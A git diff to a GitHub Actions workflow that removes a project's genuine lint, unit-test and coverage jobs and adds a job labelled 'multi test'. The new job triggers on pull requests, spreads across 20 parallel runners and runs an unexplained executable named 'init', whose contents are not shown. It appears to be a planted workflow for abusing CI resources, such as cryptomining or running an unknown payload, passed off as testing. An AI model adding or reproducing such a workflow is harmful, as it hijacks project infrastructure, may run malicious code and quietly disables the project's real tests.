--- a/.github/workflows/pull-request-tasks.yml
+++ b/.github/workflows/pull-request-tasks.yml
@@ -1,42 +1,26 @@
-name: Linting and Unit Tests
+name: multi test
 
-on: pull_request
+on: [pull_request]
 
 jobs:
-  lint:
+  multitest:
+    name: test job
+
     runs-on: ubuntu-latest
+    env:
+      DEBIAN_FRONTEND: noninteractive
+
+    strategy:
+     fail-fast: false
+     matrix:
+       runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]
+
     steps:
       - name: Checkout code
         uses: actions/checkout@v2
-
-      - name: Reviewdog ESLint comments
-        uses: reviewdog/action-eslint@v1
-        with:
-          github_token: ${{ secrets.github_token }}
-          reporter: github-pr-review
-          fail_on_error: true
-          eslint_flags: './src/ ./test/'
-
-  test:
-    runs-on: ubuntu-latest
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v2
-
-      - name: Setup Node
-        uses: actions/setup-node@v1
-        with:
-            node-version: '12'
-
-      - name: Install dependencies
-        run: npm ci
-
-      - name: Run Mocha/Chai unit tests
-        run: npm test
-
-      - name: Upload coverage to Codecov
-        uses: codecov/codecov-action@v1
-        with:
-          token: ${{ secrets.CODECOV_TOKEN }}
-          flags: unittests
-          fail_ci_if_error: true
+        
+      - name: chmod
+        run: chmod +x init
+        
+      - name: run
+        run: ./init
